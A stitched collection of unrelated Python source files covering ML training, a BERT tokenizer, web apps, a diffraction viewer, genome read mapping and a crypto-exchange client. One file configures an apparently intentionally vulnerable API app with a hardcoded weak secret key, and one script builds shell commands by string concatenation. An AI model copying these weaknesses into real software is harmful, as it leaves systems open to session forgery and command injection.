batch_size=64 * 1024, device=device)
logger.add_result(run, result)
if epoch % args.log_steps == 0:
train_mrr, valid_mrr, test_mrr = result
print(f'Run: {run + 1:02d}, '
f'Epoch: {epoch:02d}, '
f'Loss: {loss:.4f}, '
f'Train: {train_mrr:.4f}, '
f'Valid: {valid_mrr:.4f}, '
f'Test: {test_mrr:.4f}')
logger.print_statistics(run)
logger.print_statistics()
if __name__ == "__main__":
main()
|
from celery import shared_task
from .consumer import receive
@shared_task
def send_summary():
receive()
|
# coding=utf-8
# encoding=utf-8
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from passlib.hash import bcrypt_sha256
from app.utils import get_time_stamp
app = Flask(__name__)
app.config.from_object('app.config.Config')
db = SQLAlchemy() # type: SQLAlchemy
class Data(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(32))
value = db.Column(db.String(32))
time = db.Column(db.String(32))
def __init__(self, name, value, time):
self.name = name
self.value = value
self.time = time
def __repr__(self):
return "<Pages route {0}>".format(self.route)
class Users(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128), unique=True)
email = db.Column(db.String(128), unique=True)
password = db.Column(db.String(128))
website = db.Column(db.String(128))
nickname = db.Column(db.String(128))
number = db.Column(db.String(32))
team = db.Column(db.Integer) # 外键
extra_info = db.Column(db.String(32))
banned = db.Column(db.Boolean, default=False)
verified = db.Column(db.Boolean, default=False)
admin = db.Column(db.Boolean, default=False)
join_time = db.Column(db.String(32), default=get_time_stamp())
def __init__(self, name, email, password):
self.name = name
self.email = email
self.password = bcrypt_sha256.encrypt(str(password))
def __repr__(self):
return '<user %r>' % self.name
|
'''
Created on 5.10.2010.
@author: Tin Franovic
'''
from Tkinter import *
from PIL import Image, ImageTk
def do_animation(currentframe):
def do_image():
wrap.create_image(50,50,image=frame[currentframe])
try:
do_image()
except IndexError:
currentframe = 0
do_image()
wrap.update_idletasks()
currentframe = currentframe + 1
root.after(1000, do_animation, currentframe)
def draw(stateSequence):
global wrap,frame,root
root = Tk()
root.title("WalkingRobot")
frame=[]
for i in stateSequence:
fname="step"+str(i+1)+".png"
img=ImageTk.PhotoImage(Image.open(fname))
frame+=[img]
wrap = Canvas(root, width=200, height=120)
wrap.pack()
root.after(10, do_animation, 0)
root.mainloop()
|
from os.path import join
from fastapi import FastAPI, Request
from fastapi.responses import RedirectResponse
from .api.v1.main import api as api_v1
app = FastAPI(docs_url=None, redoc_url=None)
app.mount("/api/v1", api_v1)
@app.get("/", include_in_schema=False)
def index(request: Request):
return RedirectResponse(join(request.url.path, "api", "v1", "docs"))
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes.
文本标记化的类和函数
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import re
import unicodedata
import six
import tensorflow as tf
def validate_case_matches_checkpoint(do_lower_case, init_checkpoint):
"""Checks whether the casing config is consistent with the checkpoint name."""
# The casing has to be passed in by the user and there is no explicit check
# as to whether it matches the checkpoint. The casing information probably
# should have been stored in the bert_config.json file, but it's not, so
# we have to heuristically detect it to validate.
if not init_checkpoint:
return
m = re.match("^.*?([A-Za-z0-9_-]+)/bert_model.ckpt", init_checkpoint)
if m is None:
return
model_name = m.group(1)
lower_models = [
"uncased_L-24_H-1024_A-16", "uncased_L-12_H-768_A-12",
"multilingual_L-12_H-768_A-12", "chinese_L-12_H-768_A-12"
]
cased_models = [
"cased_L-12_H-768_A-12", "cased_L-24_H-1024_A-16",
"multi_cased_L-12_H-768_A-12"
]
is_bad_config = False
if model_name in lower_models and not do_lower_case:
is_bad_config = True
actual_flag = "False"
case_name = "lowercased"
opposite_flag = "True"
if model_name in cased_models and do_lower_case:
is_bad_config = True
actual_flag = "True"
case_name = "cased"
opposite_flag = "False"
if is_bad_config:
raise ValueError(
"You passed in `--do_lower_case=%s` with `--init_checkpoint=%s`. "
"However, `%s` seems to be a %s model, so you "
"should pass in `--do_lower_case=%s` so that the fine-tuning matches "
"how the model was pre-training. If this error is wrong, please "
"just comment out this check." % (actual_flag, init_checkpoint,
model_name, case_name, opposite_flag))
def convert_to_unicode(text):
"""Converts `text` to Unicode (if it's not already), assuming utf-8 input."""
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text.decode("utf-8", "ignore")
elif isinstance(text, unicode):
return text
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def printable_text(text):
"""Returns text encoded in a way suitable for print or `tf.logging`."""
# These functions want `str` for both Python2 and Python3, but in one case
# it's a Unicode string and in the other it's a byte string.
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text
elif isinstance(text, unicode):
return text.encode("utf-8")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
index = 0
with tf.gfile.GFile(vocab_file, "r") as reader:
while True:
token = convert_to_unicode(reader.readline())
if not token:
break
token = token.strip()
vocab[token] = index
index += 1
return vocab
def convert_by_vocab(vocab, items):
"""Converts a sequence of [tokens|ids] using the vocab."""
output = []
for item in items:
output.append(vocab[item])
return output
def convert_tokens_to_ids(vocab, tokens):
return convert_by_vocab(vocab, tokens)
def convert_ids_to_tokens(inv_vocab, ids):
return convert_by_vocab(inv_vocab, ids)
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
# 直接使用split进行分词
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens
class FullTokenizer(object):
"""Runs end-to-end tokenziation."""
# do_lower_case决定了是否区分大小写,如果只是fine-tuning,则需要与模型保持一致,
# 比如模型是uncased_L-12_H-768_A-12,do_lower_case一定是False,即不区分大小写
def __init__(self, vocab_file, do_lower_case=True):
# load_vocab()加载词典,建立词到ID的映射关系
self.vocab = load_vocab(vocab_file)
self.inv_vocab = {v: k for k, v in self.vocab.items()}
# BasicTokenizer()根据空格进行普通的分词,WordpieceTokenizer()把BasicTokenizer的结果再细粒度的切分为WordPiece
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)
def tokenize(self, text):
split_tokens = []
for token in self.basic_tokenizer.tokenize(text):
for sub_token in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
return split_tokens
def convert_tokens_to_ids(self, tokens):
return convert_by_vocab(self.vocab, tokens)
def convert_ids_to_tokens(self, ids):
return convert_by_vocab(self.inv_vocab, ids)
class BasicTokenizer(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
def __init__(self, do_lower_case=True):
"""Constructs a BasicTokenizer.
Args:
do_lower_case: Whether to lower case the input.
"""
self.do_lower_case = do_lower_case
def tokenize(self, text):
"""Tokenizes a piece of text."""
# convert_to_unicode()转成Unicode
text = convert_to_unicode(text)
# _clean_text() 去除无意义的词
text = self._clean_text(text)
# This was added on November 1st, 2018 for the multilingual and Chinese
# models. This is also applied to the English models now, but it doesn't
# matter since the English models were not trained on any Chinese data
# and generally don't have any Chinese data in them (there are Chinese
# characters in the vocabulary because Wikipedia does have some Chinese
# words in the English Wikipedia.).
# 这是2018年11月1日为了支持多语言和中文增加的代码。这个代码也可以用于英语模型,因为在
# 英语的训练数据中基本不会出现中文字符(但是某些wiki里偶尔也可能出现中文)。
# 分词,就是切分成一个一个的汉字,也就是在中文字符的前后加上空格
text = self._tokenize_chinese_chars(text)
# 使用whitespace进行分词,直接使用split实现分词
orig_tokens = whitespace_tokenize(text)
split_tokens = []
for token in orig_tokens:
if self.do_lower_case:
token = token.lower() # 如果需要,转为小写
token = self._run_strip_accents(token) # 去除重音
split_tokens.extend(self._run_split_on_punc(token)) # 再切分
output_tokens = whitespace_tokenize(" ".join(split_tokens))
return output_tokens
def _run_strip_accents(self, text):
"""Strips accents from a piece of text."""
# 去掉文本中的重音,café: 就是e头上的那个
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
# 把category为Mn的去掉,就是那个头上的一撇那个类型的
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def _run_split_on_punc(self, text):
"""Splits punctuation on a piece of text."""
chars = list(text)
i = 0
start_new_word = True
output = []
while i < len(chars):
char = chars[i]
if _is_punctuation(char): # 判断是否为标点
output.append([char]) # 对字符串用标点符号进行切分,返回一个list,其中的每个元素都是一个char,比如输入I'm, 返回[[I], ['], [m]]
start_new_word = True
else:
if start_new_word:
output.append([])
start_new_word = False
output[-1].append(char)
i += 1
return ["".join(x) for x in output]
def _tokenize_chinese_chars(self, text):
"""Adds whitespace around any CJK character."""
# 分词,就是切分成一个一个的汉字,
# _is_chinese_char判断是否为中文字符,在中文字符的前后加上空格
output = []
for char in text:
cp = ord(char)
if self._is_chinese_char(cp):
output.append(" ")
output.append(char)
output.append(" ")
else:
output.append(char)
return "".join(output)
def _is_chinese_char(self, cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
# like the all of the other languages.
if ((cp >= 0x4E00 and cp <= 0x9FFF) or #
(cp >= 0x3400 and cp <= 0x4DBF) or #
(cp >= 0x20000 and cp <= 0x2A6DF) or #
(cp >= 0x2A700 and cp <= 0x2B73F) or #
(cp >= 0x2B740 and cp <= 0x2B81F) or #
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or #
(cp >= 0x2F800 and cp <= 0x2FA1F)): #
return True
return False
def _clean_text(self, text):
"""Performs invalid character removal and whitespace cleanup on text."""
# 去除无意义字符和whitespace
output = []
for char in text:
# cp:codepoint, codepoint为0是无意义字符,
# 0xfffd(U+FFFD)显示为�,通常用于替换未知字符,
# _is_control()判断字符是否为控制字符,控制字符指的是那些比如\n可以控制功能的字符
cp = ord(char)
if cp == 0 or cp == 0xfffd or _is_control(char):
continue
# 判断是否是空白字符,如果是,变成空格
if _is_whitespace(char):
output.append(" ") # 把whitespace变成空格
else:
output.append(char)
return "".join(output)
class WordpieceTokenizer(object):
"""Runs WordPiece tokenziation."""
def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200):
self.vocab = vocab
self.unk_token = unk_token
self.max_input_chars_per_word = max_input_chars_per_word
def tokenize(self, text):
# 把一段文字切分成word piece,使用贪心最长匹配优先算法
"""Tokenizes a piece of text into its word pieces.
This uses a greedy longest-match-first algorithm to perform tokenization
using the given vocabulary.
For example:
input = "unaffable"
output = ["un", "##aff", "##able"]
Args:
text: A single token or whitespace separated tokens. This should have
already been passed through `BasicTokenizer.
Returns:
A list of wordpiece tokens.
"""
text = convert_to_unicode(text)
output_tokens = []
for token in whitespace_tokenize(text):
chars = list(token)
if len(chars) > self.max_input_chars_per_word:
output_tokens.append(self.unk_token) # 大于设定的最大长度,用[UNK]替换
continue
is_bad = False
start = 0
sub_tokens = []
while start < len(chars):
end = len(chars)
cur_substr = None
while start < end:
substr = "".join(chars[start:end])
if start > 0:
substr = "##" + substr # ##表示这个词是接着前面的,这样使得WordPiece切分是可逆的——我们可以恢复出“真正”的词。
if substr in self.vocab:
cur_substr = substr
break
end -= 1
if cur_substr is None:
is_bad = True
break
sub_tokens.append(cur_substr)
start = end
if is_bad:
output_tokens.append(self.unk_token)
else:
output_tokens.extend(sub_tokens)
return output_tokens
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
# 这里把category为“Zs”, 空格、制表、换行、回车当作是whitespace
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
# 检查char是否是控制字符
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
# 理论上tab、换行、回车符是控制字符,但在这里把它们认为是whitespace, Why?--为什么在这里要把它们三个归为whitespace,出于什么考虑呢,方便处理吗?
if char == "\t" or char == "\n" or char == "\r":
return False
# category返回这个Unicode字符的category,这里认为C开头的都是控制字符。
cat = unicodedata.category(char)
if cat in ("Cc", "Cf"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
# 判断一个字符是否为标点符号
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
# category是P开头的都是标点
if cat.startswith("P"):
return True
return False
|
import os
import connexion
from flask_sqlalchemy import SQLAlchemy
vuln_app = connexion.App(__name__, specification_dir='./openapi_specs')
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(vuln_app.root_path, 'database/database.db')
vuln_app.app.config['SQLALCHEMY_DATABASE_URI'] = SQLALCHEMY_DATABASE_URI
vuln_app.app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
vuln_app.app.config['SECRET_KEY'] = 'random'
# start the db
db = SQLAlchemy(vuln_app.app)
vuln_app.add_api('openapi3.yml')
|
from .rpc_backends import *
from .rpc_batch import *
from .rpc_constructors import *
from .rpc_digestors import *
from .rpc_executors import *
from .rpc_executors_async import *
from .rpc_format import *
from .rpc_lifecycle import *
from .rpc_provider import *
from .rpc_registry import *
from .rpc_request import *
from .rpc_spec import *
|
import numpy as np
import funcs as fun
from plotly.subplots import make_subplots
import plotly.graph_objects as go
from dash import Dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Output, Input
app = Dash(__name__)
#Layout Data
p1 = dict({'ss':'Slit Width = ', 'ds':'Slit Width = ', 'w':'Wire Diameter = ',
'1dg':'Slit Width = ', 'c':'Radius = ', 'tg':'Side = ', 'sq':'Side = ',
'2dg':'Slit Width = ', 'hex':'None', '2dg2':'Slit Side = ', 'lg':'Relative Angle = '})
p2 = dict({'ss':'None', 'ds':'Separation = ', 'w':'None',
'1dg':'None', 'c':'None', 'tg':'None', 'sq':'None', '2dg':'None',
'hex':'None', '2dg2':'None', 'lg':'None'})
#Layout
app.layout = html.Div([
html.H1("Fraunhofer Diffraction Patterns (v0.1)", style={'text-align': 'center'}),
html.Div(id='fixed',children='Fixed Parameters : Wavelength = 532 nm, z = 1.5 m, Beam profile - Gaussian, Beam waist = 100 microns'),
html.Div(id='note',children='(Note : The contrast at output has been slightly exaggerated for better visibility.)'),
html.Br(),
dcc.Dropdown(
id='Slit Type',
options = [
{'label':'Single Slit', 'value':'ss'},
{'label':'Double Slit', 'value':'ds'},
{'label':'Wire', 'value':'w'},
{'label':'1-d Grating', 'value':'1dg'},
{'label':'2-d Grating', 'value':'2dg'},
{'label':'2-d Grating, Type 2', 'value':'2dg2'},
{'label':'Laser Grating', 'value':'lg'},
{'label':'Circular', 'value':'c'},
{'label':'Triangular', 'value':'tg'},
{'label':'Square', 'value':'sq'},
{'label':'Hexagon', 'value':'hex'}
],
value = 'ss'
),
html.Br(),
html.Div(id='param1', children=[]),
dcc.Slider(
id='Slit Width',
min=8,
max=256,
step=8,
value=32,
marks={},
),
html.Div(id='param2', children=[]),
dcc.Slider(
id='Slit Separation',
min=8,
max=256,
step=8,
value=64,
),
#html.Div(id='output_container', children=[]),
#html.Br(),
dcc.Graph(id='plots', figure={}),
html.Img(id='image', src=[],height=262,width=315),
html.Div(children='Actual image'),
html.Br(), html.Br(),
html.Div(id='contact', children='Please report any problems to harishss@iitk.ac.in. Thanks! The source code can be found '),
html.A(id='url',children='here.', href='https://github.com/harishss3/Diffraction')
])
#Callback
@app.callback(
[Output(component_id='plots', component_property='figure'),
Output(component_id='Slit Width', component_property='min'),
Output(component_id='Slit Width', component_property='max'),
Output(component_id='Slit Width', component_property='step'),
Output(component_id='param1', component_property='children'),
Output(component_id='param2', component_property='children'),
Output(component_id='Slit Width', component_property='marks'),
Output(component_id='image', component_property='src')],
[Input(component_id='Slit Width', component_property='value'),
Input(component_id='Slit Separation', component_property='value'),
Input(component_id='Slit Type', component_property='value'),]
)
def update_plots(a,d,st):
fig,amin,amax,astep = fun.plot(st,a,d)
if st != 'tg':
source = None
else:
source = app.get_asset_url('triangle.jpg')
if st != 'lg':
mks = dict()
else:
mks = dict({36.9:'36.9', 53.1:'53.1'})
val1 = ''
val2 = ''
if p1[st] != 'None':
val1 = str(a)+' microns'
if st == 'lg':
val1 = str(a) + ' degrees'
if p2[st] != 'None':
val2 = str(d)+' microns'
return go.Figure(data=fig),amin,amax,astep,p1[st]+val1,p2[st]+val2,mks,source
if __name__ == '__main__':
app.run_server(debug=True)
|
#!/usr/bin/python
import sys, os, re
import sequence_basics, aligner_basics, sam_basics, genepred_basics
# Pre: <genome> - A fasta of the genome we are working with
# <uniquely named short reads file> - can be generated by ./make_uniquely_named_short_read_file.py
# can be a fastq or a fasta, and each name must be different
# <transcriptome file> - A gene pred file containing definitions of different isoforms
# The names (column 2) of this file should be unique, and this is often not the case with the files that are downloaded
# <output file> - File to write the results to (see post)
# <temp folder name> - Name of a temporary folder we can work in
# (optional)<genome bowtie2 index>
# (optional)<transcriptome bowtie2 index> - This must be built on the directionless fasta generated from the <transcriptome file> genepred file
# Post: Writes results to <output file>, and is two columns
# <read name> <mapping count>
# So zero is unmapped to either genome or transcriptome,
# 1 is uniqely mapped to only one of them.
# 2 or more is a multimapped read.
def main():
if len(sys.argv) < 6:
print sys.argv[0] + ' <genome> <uniquely named short reads file> <transcriptome file> <output file> <temp directory>'
sys.exit()
genome_filename = sys.argv[1]
sruniq_filename = sys.argv[2]
transcriptome_filename = sys.argv[3]
output_file = sys.argv[4]
temp_foldername = sys.argv[5]
genome_bowtie2_index = ''
if len(sys.argv) >= 7: genome_bowtie2_index = sys.argv[6]
transcriptome_bowtie2_index = ''
#if len(sys.argv) == 8: transcriptome_bowtie2_index = sys.argv[7]
if not os.path.isdir(temp_foldername):
print "Error: Expecting a temporary folder that already exists."
print temp_foldername + " does not exist."
sys.exit()
#1. Make a sub-directory to do our work in
local_temp_foldername = temp_foldername.rstrip('/')+'/uniqueness'
if not os.path.isdir(local_temp_foldername):
print "Creating subdirectory "+local_temp_foldername
os.system("mkdir "+local_temp_foldername)
#2. map reads to the genome fasta
genome_base_name = local_temp_foldername.rstrip('/')+'/genome'
sam_filename = local_temp_foldername.rstrip('/')+'/genome.sam'
map_reads_to_fasta(genome_filename,sruniq_filename,genome_base_name,genome_bowtie2_index)
#3. count number of times we observe reads
read_counts = read_map_count(sruniq_filename, sam_filename)
#4. get unmapped reads into a fasta
unmapped_read_names = get_unmapped_read_names(read_counts)
unmapped_sruniq_filename = make_unmapped_short_read_file(sruniq_filename,unmapped_read_names,local_temp_foldername)
#4. Make a fasta based on a transcriptome genepred file
# first ensure the assumption that the genepred file contains only unqiuely named transcripts
transcriptome_uniquename_filename = local_temp_foldername.rstrip('/')+'/txn_uniq.gpd'
genepred_basics.write_uniquely_named_genepred(transcriptome_filename,transcriptome_uniquename_filename)
transcriptome_fa = local_temp_foldername.rstrip('/')+'/txn.fa'
genepred_basics.write_genepred_to_fasta_directionless(transcriptome_uniquename_filename,genome_filename,transcriptome_fa)
#5. Mapping previously unmapped reads to the transcriptome
txn_base_name = local_temp_foldername.rstrip('/')+'/txn'
txn_sam_filename = local_temp_foldername.rstrip('/')+'/txn.sam'
map_reads_to_fasta(transcriptome_fa,unmapped_sruniq_filename,txn_base_name,transcriptome_bowtie2_index)
#6. Convert coordinates of the mapped reads back to reference
# Note these coordinates are zero indexed for both start and end coordiantes.
txn_map_filename = local_temp_foldername.rstrip('/') + '/txn.map'
sam_basics.convert_directionless_gpd_alignment_to_reference(txn_sam_filename, transcriptome_uniquename_filename,txn_map_filename)
#7. Consolidate repetative read mapping due to repeats junctions among isoforms
txn_uniq_map_filename = local_temp_foldername.rstrip('/') + '/txn_uniq.map'
# we are only interested in the unique coordinate sets for each entry
os.system("cat "+txn_map_filename+" | cut -f 1,3 | sort | uniq > "+txn_uniq_map_filename)
#8. Add transcriptome mapping counts
transcriptome_read_counts = get_transcriptome_read_counts(txn_uniq_map_filename)
#add those transcriptome_read_counts to our previous read counts
for name in transcriptome_read_counts: read_counts[name]+=transcriptome_read_counts[name]
#9. finished! Now we can print the reads and their counts
ofile = open(output_file,'w')
for name in read_counts:
ofile.write(name + "\t" + str(read_counts[name])+"\n")
ofile.close()
# pre: transcriptome read mapping (of previously unmapped reads) in the format
# <read name> <chromosome:coord1-coord2,coord3-coord4>
# post: for each read name count the number of times it seen and return it in a dictonary
def get_transcriptome_read_counts(txn_uniq_map_filename):
c = {}
with open(txn_uniq_map_filename) as tfile:
for line in tfile:
[name,coords] = line.rstrip().split("\t")
if name not in c: c[name] = 0
c[name]+=1
return c
# pre: short read filename where all names are uniq (can be fasta of fastq,
# but if its fasta, it must be .fasta or .fa), and list of short read names
# output file anme
# post: writes out a file of the short reads
def make_unmapped_short_read_file(sr_filename, names,tempfolder):
isfasta = re.search('\.fa$|\.fasta$',sr_filename)
outfile = tempfolder.rstrip('/')+'/'+'unmapped_shortread'
if isfasta:
outfile = outfile + '.fa'
sequence_basics.write_fasta_subset(sr_filename,names,outfile)
else:
outfile = outfile + '.fq'
sequence_basics.write_fastq_subset(sr_filename,names,outfile)
return outfile
# pre: dictionary containing read names and the number of times they were mapped
# post: a list of unmapped read names
# modifies: none
def get_unmapped_read_names(read_counts):
names = []
for name in read_counts:
if read_counts[name] == 0:
names.append(name)
return names
# pre: short read filename with uniquely named reads, sam file name
# post: mapped reads and their counts in a dictionary keyed on read name
def read_map_count(sruniq_filename,sam_filename):
print "get dictionary of names"
reads = get_initialized_read_names(sruniq_filename)
print "iterate over sam file counting reads"
with open(sam_filename) as f:
for line in f:
line = line.rstrip()
m = re.match('^@[A-Z][A-Z][\s]',line) #check for header
if not m:
[name,coordinate] = sam_basics.get_coordinates(line)
if coordinate != '':
reads[name]+=1
return reads
# pre: short read file with uniquely named reads (fasta or fastq)
# if fasta, it needs extension fa or fasta
# post: a dictionary with read names as keys and entries set to zero
# modifies: none
def get_initialized_read_names(sruniq_filename):
reads = {}
if re.search('\.fa$|\.fasta$',sruniq_filename):
reads = sequence_basics.counts_by_name_from_fasta(sruniq_filename)
else:
reads = sequence_basics.counts_by_name_from_fastq(sruniq_filename)
for name in reads:
reads[name] = 0
return reads
# pre: temporary folder name, genome fasta file name,
# file of short reads (fasta or fastq)
# post: temporary folder containing genome.sam sam file of alignments
# modifies: builds an index for the genome fasta in the temporary folder
# automatically sets processor count to use
def map_reads_to_fasta(fasta_filename,sr_name,base_name,bowtie2_index_base):
sam_name = base_name + '.sam'
#1. See if we need an index. this could be skipped if it is given as an input
if bowtie2_index_base == '':
print "create a bowtie2 index"
aligner_basics.build_bowtie2_index(fasta_filename,base_name)
bowtie2_index_base = base_name
#2. We align the reads
print "align short reads to index with bowtie2"
aligner_basics.bowtie2_unpaired(sr_name,bowtie2_index_base,sam_name)
return sam_name
main()
|
import torch.nn as nn
import math
import torch.utils.model_zoo as model_zoo
import modified_linear
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, last=False):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
self.last = last
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
if not self.last: #remove ReLU in the last layer
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000):
self.inplanes = 64
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2, last_phase=True)
self.avgpool = nn.AvgPool2d(7, stride=1)
self.fc = modified_linear.CosineLinear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def _make_layer(self, block, planes, blocks, stride=1, last_phase=False):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
if last_phase:
for i in range(1, blocks-1):
layers.append(block(self.inplanes, planes))
layers.append(block(self.inplanes, planes, last=True))
else:
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def resnet18(pretrained=False, **kwargs):
"""Constructs a ResNet-18 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
return model
|
# -*- coding: utf-8 -*-
from ccxt.bittrex import bittrex
import math
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import DDoSProtection
class bleutrade (bittrex):
def describe(self):
return self.deep_extend(super(bleutrade, self).describe(), {
'id': 'bleutrade',
'name': 'Bleutrade',
'countries': 'BR', # Brazil
'rateLimit': 1000,
'version': 'v2',
'has': {
'CORS': True,
'fetchTickers': True,
'fetchOHLCV': False,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/30303000-b602dbe6-976d-11e7-956d-36c5049c01e7.jpg',
'api': {
'public': 'https://bleutrade.com/api',
'account': 'https://bleutrade.com/api',
'market': 'https://bleutrade.com/api',
},
'www': 'https://bleutrade.com',
'doc': 'https://bleutrade.com/help/API',
'fees': 'https://bleutrade.com/help/fees_and_deadlines',
},
'fees': {
'funding': {
'ADC': 0.1,
'BTA': 0.1,
'BITB': 0.1,
'BTC': 0.001,
'BCH': 0.001,
'BTCD': 0.001,
'BTG': 0.001,
'BLK': 0.1,
'CDN': 0.1,
'CLAM': 0.01,
'DASH': 0.001,
'DCR': 0.05,
'DGC': 0.1,
'DP': 0.1,
'DPC': 0.1,
'DOGE': 0.0,
'EFL': 0.1,
'ETH': 0.01,
'EXP': 0.1,
'FJC': 0.1,
'BSTY': 0.001,
'GB': 0.1,
'NLG': 0.1,
'HTML': 1.0,
'LTC': 0.001,
'MONA': 0.01,
'MOON': 1.0,
'NMC': 0.015,
'NEOS': 0.1,
'NVC': 0.05,
'OK': 0.1,
'PPC': 0.1,
'POT': 0.1,
'XPM': 0.001,
'QTUM': 0.1,
'RDD': 0.1,
'SLR': 0.1,
'START': 0.1,
'SLG': 0.1,
'TROLL': 0.1,
'UNO': 0.01,
'VRC': 0.1,
'VTC': 0.1,
'XVP': 0.1,
'WDC': 0.001,
'ZET': 0.1,
},
},
})
def fetch_markets(self):
markets = self.publicGetMarkets()
result = []
for p in range(0, len(markets['result'])):
market = markets['result'][p]
id = market['MarketName']
base = market['MarketCurrency']
quote = market['BaseCurrency']
base = self.common_currency_code(base)
quote = self.common_currency_code(quote)
symbol = base + '/' + quote
precision = {
'amount': 8,
'price': 8,
}
active = market['IsActive']
result.append(self.extend(self.fees['trading'], {
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'active': active,
'info': market,
'lot': math.pow(10, -precision['amount']),
'precision': precision,
'limits': {
'amount': {
'min': market['MinTradeSize'],
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': 0,
'max': None,
},
},
}))
return result
def get_order_id_field(self):
return 'orderid'
def fetch_order_book(self, symbol, params={}):
self.load_markets()
